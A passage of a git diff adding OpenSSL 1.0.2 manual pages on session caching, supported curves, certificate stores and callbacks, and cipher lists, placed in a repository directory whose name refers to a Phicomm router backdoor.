+In client mode a session set with L<SSL_set_session(3)|SSL_set_session(3)>
+successfully reused is counted as a hit. In server mode a session successfully
+retrieved from internal or external cache is counted as a hit.
+
+SSL_CTX_sess_cb_hits() returns the number of successfully retrieved sessions
+from the external session cache in server mode.
+
+SSL_CTX_sess_misses() returns the number of sessions proposed by clients
+that were not found in the internal session cache in server mode.
+
+SSL_CTX_sess_timeouts() returns the number of sessions proposed by clients
+and either found in the internal or external session cache in server mode,
+ but that were invalid due to timeout. These sessions are not included in
+the SSL_CTX_sess_hits() count.
+
+SSL_CTX_sess_cache_full() returns the number of sessions that were removed
+because the maximum session cache size was exceeded.
+
+=head1 RETURN VALUES
+
+The functions return the values indicated in the DESCRIPTION section.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_set_session(3)|SSL_set_session(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>
+L<SSL_CTX_sess_set_cache_size(3)|SSL_CTX_sess_set_cache_size(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_set_cache_size.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_set_cache_size.pod
new file mode 100644
index 0000000..4aeda09
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_set_cache_size.pod
@@ -0,0 +1,53 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_sess_set_cache_size, SSL_CTX_sess_get_cache_size - manipulate session cache size
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_sess_set_cache_size(SSL_CTX *ctx, long t);
+ long SSL_CTX_sess_get_cache_size(SSL_CTX *ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_sess_set_cache_size() sets the size of the internal session cache
+of context B<ctx> to B<t>.
+This value is a hint and not an absolute; see the notes below.
+
+SSL_CTX_sess_get_cache_size() returns the currently valid session cache size.
+
+=head1 NOTES
+
+The internal session cache size is SSL_SESSION_CACHE_MAX_SIZE_DEFAULT,
+currently 1024*20, so that up to 20000 sessions can be held. This size
+can be modified using the SSL_CTX_sess_set_cache_size() call. A special
+case is the size 0, which is used for unlimited size.
+
+If adding the session makes the cache exceed its size, then unused
+sessions are dropped from the end of the cache.
+Cache space may also be reclaimed by calling
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)> to remove
+expired sessions.
+
+If the size of the session cache is reduced and more sessions are already
+in the session cache, old session will be removed at the next time a
+session shall be added. This removal is not synchronized with the
+expiration of sessions.
+
+=head1 RETURN VALUES
+
+SSL_CTX_sess_set_cache_size() returns the previously valid size.
+
+SSL_CTX_sess_get_cache_size() returns the currently valid size.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+L<SSL_CTX_sess_number(3)|SSL_CTX_sess_number(3)>,
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_set_get_cb.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_set_get_cb.pod
new file mode 100644
index 0000000..b9d54a4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_set_get_cb.pod
@@ -0,0 +1,87 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_sess_set_new_cb, SSL_CTX_sess_set_remove_cb, SSL_CTX_sess_set_get_cb, SSL_CTX_sess_get_new_cb, SSL_CTX_sess_get_remove_cb, SSL_CTX_sess_get_get_cb - provide callback functions for server side external session caching
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_sess_set_new_cb(SSL_CTX *ctx,
+			      int (*new_session_cb)(SSL *, SSL_SESSION *));
+ void SSL_CTX_sess_set_remove_cb(SSL_CTX *ctx,
+	   void (*remove_session_cb)(SSL_CTX *ctx, SSL_SESSION *));
+ void SSL_CTX_sess_set_get_cb(SSL_CTX *ctx,
+	   SSL_SESSION (*get_session_cb)(SSL *, unsigned char *, int, int *));
+
+ int (*SSL_CTX_sess_get_new_cb(SSL_CTX *ctx))(struct ssl_st *ssl, SSL_SESSION *sess);
+ void (*SSL_CTX_sess_get_remove_cb(SSL_CTX *ctx))(struct ssl_ctx_st *ctx, SSL_SESSION *sess);
+ SSL_SESSION *(*SSL_CTX_sess_get_get_cb(SSL_CTX *ctx))(struct ssl_st *ssl, unsigned char *data, int len, int *copy);
+
+ int (*new_session_cb)(struct ssl_st *ssl, SSL_SESSION *sess);
+ void (*remove_session_cb)(struct ssl_ctx_st *ctx, SSL_SESSION *sess);
+ SSL_SESSION *(*get_session_cb)(struct ssl_st *ssl, unsigned char *data,
+	       int len, int *copy);
+
+=head1 DESCRIPTION
+
+SSL_CTX_sess_set_new_cb() sets the callback function, which is automatically
+called whenever a new session was negotiated.
+
+SSL_CTX_sess_set_remove_cb() sets the callback function, which is
+automatically called whenever a session is removed by the SSL engine,
+because it is considered faulty or the session has become obsolete because
+of exceeding the timeout value.
+
+SSL_CTX_sess_set_get_cb() sets the callback function which is called,
+whenever a SSL/TLS client proposed to resume a session but the session
+could not be found in the internal session cache (see
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>).
+(SSL/TLS server only.)
+
+SSL_CTX_sess_get_new_cb(), SSL_CTX_sess_get_remove_cb(), and
+SSL_CTX_sess_get_get_cb() allow to retrieve the function pointers of the
+provided callback functions. If a callback function has not been set,
+the NULL pointer is returned.
+
+=head1 NOTES
+
+In order to allow external session caching, synchronization with the internal
+session cache is realized via callback functions. Inside these callback
+functions, session can be saved to disk or put into a database using the
+L<d2i_SSL_SESSION(3)|d2i_SSL_SESSION(3)> interface.
+
+The new_session_cb() is called, whenever a new session has been negotiated
+and session caching is enabled (see
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>).
+The new_session_cb() is passed the B<ssl> connection and the ssl session
+B<sess>. If the callback returns B<0>, the session will be immediately
+removed again.
+
+The remove_session_cb() is called, whenever the SSL engine removes a session
+from the internal cache. This happens when the session is removed because
+it is expired or when a connection was not shutdown cleanly. It also happens
+for all sessions in the internal session cache when
+L<SSL_CTX_free(3)|SSL_CTX_free(3)> is called. The remove_session_cb() is passed
+the B<ctx> and the ssl session B<sess>. It does not provide any feedback.
+
+The get_session_cb() is only called on SSL/TLS servers with the session id
+proposed by the client. The get_session_cb() is always called, also when
+session caching was disabled. The get_session_cb() is passed the
+B<ssl> connection, the session id of length B<length> at the memory location
+B<data>. With the parameter B<copy> the callback can require the
+SSL engine to increment the reference count of the SSL_SESSION object,
+Normally the reference count is not incremented and therefore the
+session must not be explicitly freed with
+L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<d2i_SSL_SESSION(3)|d2i_SSL_SESSION(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)>,
+L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>,
+L<SSL_CTX_free(3)|SSL_CTX_free(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sessions.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sessions.pod
new file mode 100644
index 0000000..e05aab3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sessions.pod
@@ -0,0 +1,34 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_sessions - access internal session cache
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ struct lhash_st *SSL_CTX_sessions(SSL_CTX *ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_sessions() returns a pointer to the lhash databases containing the
+internal session cache for B<ctx>.
+
+=head1 NOTES
+
+The sessions in the internal session cache are kept in an
+L<lhash(3)|lhash(3)> type database. It is possible to directly
+access this database e.g. for searching. In parallel, the sessions
+form a linked list which is maintained separately from the
+L<lhash(3)|lhash(3)> operations, so that the database must not be
+modified directly but by using the
+L<SSL_CTX_add_session(3)|SSL_CTX_add_session(3)> family of functions.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<lhash(3)|lhash(3)>,
+L<SSL_CTX_add_session(3)|SSL_CTX_add_session(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set1_curves.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set1_curves.pod
new file mode 100644
index 0000000..18d0c9a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set1_curves.pod
@@ -0,0 +1,103 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set1_curves, SSL_CTX_set1_curves_list, SSL_set1_curves,
+SSL_set1_curves_list, SSL_get1_curves, SSL_get_shared_curve,
+SSL_CTX_set_ecdh_auto, SSL_set_ecdh_auto - EC supported curve functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_set1_curves(SSL_CTX *ctx, int *clist, int clistlen);
+ int SSL_CTX_set1_curves_list(SSL_CTX *ctx, char *list);
+
+ int SSL_set1_curves(SSL *ssl, int *clist, int clistlen);
+ int SSL_set1_curves_list(SSL *ssl, char *list);
+
+ int SSL_get1_curves(SSL *ssl, int *curves);
+ int SSL_get_shared_curve(SSL *s, int n);
+
+ int SSL_CTX_set_ecdh_auto(SSL_CTX *ctx, int onoff);
+ int SSL_set_ecdh_auto(SSL *s, int onoff);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set1_curves() sets the supported curves for B<ctx> to B<clistlen>
+curves in the array B<clist>. The array consist of all NIDs of curves in
+preference order. For a TLS client the curves are used directly in the
+supported curves extension. For a TLS server the curves are used to 
+determine the set of shared curves.
+
+SSL_CTX_set1_curves_list() sets the supported curves for B<ctx> to
+string B<list>. The string is a colon separated list of curve NIDs or
+names, for example "P-521:P-384:P-256".
+
+SSL_set1_curves() and SSL_set1_curves_list() are similar except they set
+supported curves for the SSL structure B<ssl>.
+
+SSL_get1_curves() returns the set of supported curves sent by a client
+in the supported curves extension. It returns the total number of 
+supported curves. The B<curves> parameter can be B<NULL> to simply
+return the number of curves for memory allocation purposes. The
+B<curves> array is in the form of a set of curve NIDs in preference
+order. It can return zero if the client did not send a supported curves
+extension.
+
+SSL_get_shared_curve() returns shared curve B<n> for a server-side
+SSL B<ssl>. If B<n> is -1 then the total number of shared curves is
+returned, which may be zero. Other than for diagnostic purposes,
+most applications will only be interested in the first shared curve
+so B<n> is normally set to zero. If the value B<n> is out of range,
+NID_undef is returned.
+
+SSL_CTX_set_ecdh_auto() and SSL_set_ecdh_auto() set automatic curve
+selection for server B<ctx> or B<ssl> to B<onoff>. If B<onoff> is 1 then 
+the highest preference curve is automatically used for ECDH temporary
+keys used during key exchange.
+
+All these functions are implemented as macros.
+
+=head1 NOTES
+
+If an application wishes to make use of several of these functions for
+configuration purposes either on a command line or in a file it should
+consider using the SSL_CONF interface instead of manually parsing options.
+
+The functions SSL_CTX_set_ecdh_auto() and SSL_set_ecdh_auto() can be used to
+make a server always choose the most appropriate curve for a client. If set
+it will override any temporary ECDH parameters set by a server. Previous
+versions of OpenSSL could effectively only use a single ECDH curve set
+using a function such as SSL_CTX_set_ecdh_tmp(). Newer applications should
+just call:
+
+ SSL_CTX_set_ecdh_auto(ctx, 1);
+
+and they will automatically support ECDH using the most appropriate shared
+curve.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set1_curves(), SSL_CTX_set1_curves_list(), SSL_set1_curves(),
+SSL_set1_curves_list(), SSL_CTX_set_ecdh_auto() and SSL_set_ecdh_auto()
+return 1 for success and 0 for failure.
+
+SSL_get1_curves() returns the number of curves, which may be zero.
+
+SSL_get_shared_curve() returns the NID of shared curve B<n> or NID_undef if there
+is no shared curve B<n>; or the total number of shared curves if B<n>
+is -1.
+
+When called on a client B<ssl>, SSL_get_shared_curve() has no meaning and
+returns -1.
+
+=head1 SEE ALSO
+
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.2.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set1_verify_cert_store.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set1_verify_cert_store.pod
new file mode 100644
index 0000000..493cca4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set1_verify_cert_store.pod
@@ -0,0 +1,91 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set0_verify_cert_store, SSL_CTX_set1_verify_cert_store,
+SSL_CTX_set0_chain_cert_store, SSL_CTX_set1_chain_cert_store,
+SSL_set0_verify_cert_store, SSL_set1_verify_cert_store,
+SSL_set0_chain_cert_store, SSL_set1_chain_cert_store - set certificate
+verification or chain store
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_set0_verify_cert_store(SSL_CTX *ctx, X509_STORE *st);
+ int SSL_CTX_set1_verify_cert_store(SSL_CTX *ctx, X509_STORE *st);
+ int SSL_CTX_set0_chain_cert_store(SSL_CTX *ctx, X509_STORE *st);
+ int SSL_CTX_set1_chain_cert_store(SSL_CTX *ctx, X509_STORE *st);
+
+ int SSL_set0_verify_cert_store(SSL_CTX *ctx, X509_STORE *st);
+ int SSL_set1_verify_cert_store(SSL_CTX *ctx, X509_STORE *st);
+ int SSL_set0_chain_cert_store(SSL_CTX *ctx, X509_STORE *st);
+ int SSL_set1_chain_cert_store(SSL_CTX *ctx, X509_STORE *st);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set0_verify_cert_store() and SSL_CTX_set1_verify_cert_store()
+set the certificate store used for certificate verification to B<st>.
+
+SSL_CTX_set0_chain_cert_store() and SSL_CTX_set1_chain_cert_store()
+set the certificate store used for certificate chain building to B<st>.
+
+SSL_set0_verify_cert_store(), SSL_set1_verify_cert_store(),
+SSL_set0_chain_cert_store() and SSL_set1_chain_cert_store() are similar
+except they apply to SSL structure B<ssl>.
+
+All these functions are implemented as macros. Those containing a B<1>
+increment the reference count of the supplied store so it must
+be freed at some point after the operation. Those containing a B<0> do
+not increment reference counts and the supplied store B<MUST NOT> be freed
+after the operation.
+
+=head1 NOTES
+
+The stores pointers associated with an SSL_CTX structure are copied to any SSL
+structures when SSL_new() is called. As a result SSL structures will not be
+affected if the parent SSL_CTX store pointer is set to a new value.
+
+The verification store is used to verify the certificate chain sent by the
+peer: that is an SSL/TLS client will use the verification store to verify
+the server's certificate chain and a SSL/TLS server will use it to verify
+any client certificate chain.
+
+The chain store is used to build the certificate chain.
+
+If the mode B<SSL_MODE_NO_AUTO_CHAIN> is set or a certificate chain is
+configured already (for example using the functions such as 
+L<SSL_CTX_add1_chain_cert(3)|SSL_CTX_add1_chain_cert(3)> or
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>) then
+automatic chain building is disabled.
+
+If the mode B<SSL_MODE_NO_AUTO_CHAIN> is set then automatic chain building
+is disabled.
+
+If the chain or the verification store is not set then the store associated
+with the parent SSL_CTX is used instead to retain compatibility with previous
+versions of OpenSSL.
+
+=head1 RETURN VALUES
+
+All these functions return 1 for success and 0 for failure.
+
+=head1 SEE ALSO
+
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>
+L<SSL_CTX_set0_chain(3)|SSL_CTX_set0_chain(3)>
+L<SSL_CTX_set1_chain(3)|SSL_CTX_set1_chain(3)>
+L<SSL_CTX_add0_chain_cert(3)|SSL_CTX_add0_chain_cert(3)>
+L<SSL_CTX_add1_chain_cert(3)|SSL_CTX_add1_chain_cert(3)>
+L<SSL_set0_chain(3)|SSL_set0_chain(3)>
+L<SSL_set1_chain(3)|SSL_set1_chain(3)>
+L<SSL_add0_chain_cert(3)|SSL_add0_chain_cert(3)>
+L<SSL_add1_chain_cert(3)|SSL_add1_chain_cert(3)>
+L<SSL_CTX_build_cert_chain(3)|SSL_CTX_build_cert_chain(3)>
+L<SSL_build_cert_chain(3)|SSL_build_cert_chain(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.2.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_cb.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_cb.pod
new file mode 100644
index 0000000..141d828
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_cb.pod
@@ -0,0 +1,68 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_cert_cb, SSL_set_cert_cb - handle certificate callback function
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_cert_cb(SSL_CTX *c, int (*cert_cb)(SSL *ssl, void *arg), void *arg);
+ void SSL_set_cert_cb(SSL *s, int (*cert_cb)(SSL *ssl, void *arg), void *arg);
+
+ int (*cert_cb)(SSL *ssl, void *arg);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_cert_cb() and SSL_set_cert_cb() sets the B<cert_cb()> callback,
+B<arg> value is pointer which is passed to the application callback.
+
+When B<cert_cb()> is NULL, no callback function is used.
+
+cert_cb() is the application defined callback. It is called before a
+certificate will be used by a client or server. The callback can then inspect
+the passed B<ssl> structure and set or clear any appropriate certificates. If
+the callback is successful it B<MUST> return 1 even if no certificates have
+been set. A zero is returned on error which will abort the handshake with a
+fatal internal error alert. A negative return value will suspend the handshake
+and the handshake function will return immediately.
+L<SSL_get_error(3)|SSL_get_error(3)> will return SSL_ERROR_WANT_X509_LOOKUP to
+indicate, that the handshake was suspended. The next call to the handshake
+function will again lead to the call of cert_cb(). It is the job of the
+cert_cb() to store information about the state of the last call,
+if required to continue.
+
+=head1 NOTES
+
+An application will typically call SSL_use_certificate() and
+SSL_use_PrivateKey() to set the end entity certificate and private key.
+It can add intermediate and optionally the root CA certificates using
+SSL_add1_chain_cert().
+
+It might also call SSL_certs_clear() to delete any certificates associated
+with the B<SSL> object.
+
+The certificate callback functionality supercedes the (largely broken)
+functionality provided by the old client certificate callback interface.
+It is B<always> called even is a certificate is already set so the callback
+can modify or delete the existing certificate.
+
+A more advanced callback might examine the handshake parameters and set
+whatever chain is appropriate. For example a legacy client supporting only
+TLS v1.0 might receive a certificate chain signed using SHA1 whereas a
+TLS v1.2 client which advertises support for SHA256 could receive a chain
+using SHA256.
+
+Normal server sanity checks are performed on any certificates set
+by the callback. So if an EC chain is set for a curve the client does not
+support it will B<not> be used.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_use_certificate(3)|SSL_use_certificate(3)>,
+L<SSL_add1_chain_cert(3)|SSL_add1_chain_cert(3)>,
+L<SSL_get_client_CA_list(3)|SSL_get_client_CA_list(3)>,
+L<SSL_clear(3)|SSL_clear(3)>, L<SSL_free(3)|SSL_free(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_store.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_store.pod
new file mode 100644
index 0000000..846416e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_store.pod
@@ -0,0 +1,64 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_cert_store, SSL_CTX_get_cert_store - manipulate X509 certificate verification storage
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_cert_store(SSL_CTX *ctx, X509_STORE *store);
+ X509_STORE *SSL_CTX_get_cert_store(const SSL_CTX *ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_cert_store() sets/replaces the certificate verification storage
+of B<ctx> to/with B<store>. If another X509_STORE object is currently
+set in B<ctx>, it will be X509_STORE_free()ed.
+
+SSL_CTX_get_cert_store() returns a pointer to the current certificate
+verification storage.
+
+=head1 NOTES
+
+In order to verify the certificates presented by the peer, trusted CA
+certificates must be accessed. These CA certificates are made available
+via lookup methods, handled inside the X509_STORE. From the X509_STORE
+the X509_STORE_CTX used when verifying certificates is created.
+
+Typically the trusted certificate store is handled indirectly via using
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>.
+Using the SSL_CTX_set_cert_store() and SSL_CTX_get_cert_store() functions
+it is possible to manipulate the X509_STORE object beyond the
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>
+call.
+
+Currently no detailed documentation on how to use the X509_STORE
+object is available. Not all members of the X509_STORE are used when
+the verification takes place. So will e.g. the verify_callback() be
+overridden with the verify_callback() set via the
+L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)> family of functions.
+This document must therefore be updated when documentation about the
+X509_STORE object and its handling becomes available.
+
+=head1 RESTRICTIONS
+
+The X509_STORE structure used by an SSL_CTX is used for verifying peer
+certificates and building certificate chains, it is also shared by
+every child SSL structure. Applications wanting finer control can use 
+functions such as SSL_CTX_set1_verify_cert_store() instead.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_cert_store() does not return diagnostic output.
+
+SSL_CTX_get_cert_store() returns the current setting.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>,
+L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_verify_callback.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_verify_callback.pod
new file mode 100644
index 0000000..c0f4f85
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cert_verify_callback.pod
@@ -0,0 +1,75 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_cert_verify_callback - set peer certificate verification procedure
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_cert_verify_callback(SSL_CTX *ctx, int (*callback)(X509_STORE_CTX *,void *), void *arg);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_cert_verify_callback() sets the verification callback function for
+I<ctx>. SSL objects that are created from I<ctx> inherit the setting valid at
+the time when L<SSL_new(3)|SSL_new(3)> is called.
+
+=head1 NOTES
+
+Whenever a certificate is verified during a SSL/TLS handshake, a verification
+function is called. If the application does not explicitly specify a
+verification callback function, the built-in verification function is used.
+If a verification callback I<callback> is specified via
+SSL_CTX_set_cert_verify_callback(), the supplied callback function is called
+instead. By setting I<callback> to NULL, the default behaviour is restored.
+
+When the verification must be performed, I<callback> will be called with
+the arguments callback(X509_STORE_CTX *x509_store_ctx, void *arg). The 
+argument I<arg> is specified by the application when setting I<callback>.
+
+I<callback> should return 1 to indicate verification success and 0 to
+indicate verification failure. If SSL_VERIFY_PEER is set and I<callback>
+returns 0, the handshake will fail. As the verification procedure may
+allow to continue the connection in case of failure (by always returning 1)
+the verification result must be set in any case using the B<error>
+member of I<x509_store_ctx> so that the calling application will be informed
+about the detailed result of the verification procedure! 
+
+Within I<x509_store_ctx>, I<callback> has access to the I<verify_callback>
+function set using L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>.
+
+=head1 WARNINGS
+
+Do not mix the verification callback described in this function with the
+B<verify_callback> function called during the verification process. The
+latter is set using the L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>
+family of functions.
+
+Providing a complete verification procedure including certificate purpose
+settings etc is a complex task. The built-in procedure is quite powerful
+and in most cases it should be sufficient to modify its behaviour using
+the B<verify_callback> function.
+
+=head1 BUGS
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_cert_verify_callback() does not provide diagnostic information.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>,
+L<SSL_get_verify_result(3)|SSL_get_verify_result(3)>,
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>
+
+=head1 HISTORY
+
+Previous to OpenSSL 0.9.7, the I<arg> argument to B<SSL_CTX_set_cert_verify_callback>
+was ignored, and I<callback> was called simply as
+ int (*callback)(X509_STORE_CTX *)
+To compile software written for previous versions of OpenSSL, a dummy
+argument will have to be added to I<callback>.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cipher_list.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cipher_list.pod
new file mode 100644
index 0000000..c84a831
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_cipher_list.pod
@@ -0,0 +1,74 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_cipher_list, SSL_set_cipher_list - choose list of available SSL_CIPHERs
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_set_cipher_list(SSL_CTX *ctx, const char *str);
+ int SSL_set_cipher_list(SSL *ssl, const char *str);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_cipher_list() sets the list of available ciphers for B<ctx>
+using the control string B<str>. The format of the string is described
+in L<ciphers(1)|ciphers(1)>. The list of ciphers is inherited by all
+B<ssl> objects created from B<ctx>.
+
+SSL_set_cipher_list() sets the list of ciphers only for B<ssl>.
+
+=head1 NOTES
+
+The control string B<str> should be universally usable and not depend
+on details of the library configuration (ciphers compiled in). Thus no
+syntax checking takes place. Items that are not recognized, because the
+corresponding ciphers are not compiled in or because they are mistyped,
+are simply ignored. Failure is only flagged if no ciphers could be collected
+at all.
+
+It should be noted, that inclusion of a cipher to be used into the list is
+a necessary condition. On the client side, the inclusion into the list is
+also sufficient. On the server side, additional restrictions apply. All ciphers
+have additional requirements. ADH ciphers don't need a certificate, but
+DH-parameters must have been set. All other ciphers need a corresponding
+certificate and key.
+
+A RSA cipher can only be chosen, when a RSA certificate is available.
+RSA export ciphers with a keylength of 512 bits for the RSA key require
+a temporary 512 bit RSA key, as typically the supplied key has a length
+of 1024 bit (see
+L<SSL_CTX_set_tmp_rsa_callback(3)|SSL_CTX_set_tmp_rsa_callback(3)>).
+RSA ciphers using DHE need a certificate and key and additional DH-parameters
+(see L<SSL_CTX_set_tmp_dh_callback(3)|SSL_CTX_set_tmp_dh_callback(3)>).
+
+A DSA cipher can only be chosen, when a DSA certificate is available.
+DSA ciphers always use DH key exchange and therefore need DH-parameters
+(see L<SSL_CTX_set_tmp_dh_callback(3)|SSL_CTX_set_tmp_dh_callback(3)>).
+
+When these conditions are not met for any cipher in the list (e.g. a
+client only supports export RSA ciphers with a asymmetric key length
+of 512 bits and the server is not configured to use temporary RSA
+keys), the "no shared cipher" (SSL_R_NO_SHARED_CIPHER) error is generated
+and the handshake will fail.
+
+If the cipher list does not contain any SSLv2 cipher suites (this is the
+default) then SSLv2 is effectively disabled and neither clients nor servers
+will attempt to use SSLv2.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_cipher_list() and SSL_set_cipher_list() return 1 if any cipher
+could be selected and 0 on complete failure.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_get_ciphers(3)|SSL_get_ciphers(3)>,
+L<SSL_CTX_use_certificate(3)|SSL_CTX_use_certificate(3)>,
+L<SSL_CTX_set_tmp_rsa_callback(3)|SSL_CTX_set_tmp_rsa_callback(3)>,
+L<SSL_CTX_set_tmp_dh_callback(3)|SSL_CTX_set_tmp_dh_callback(3)>,
+L<ciphers(1)|ciphers(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_client_CA_list.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_client_CA_list.pod
new file mode 100644
index 0000000..4965385
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_client_CA_list.pod
@@ -0,0 +1,94 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_client_CA_list, SSL_set_client_CA_list, SSL_CTX_add_client_CA,
+SSL_add_client_CA - set list of CAs sent to the client when requesting a
+client certificate
+
+=head1 SYNOPSIS
+
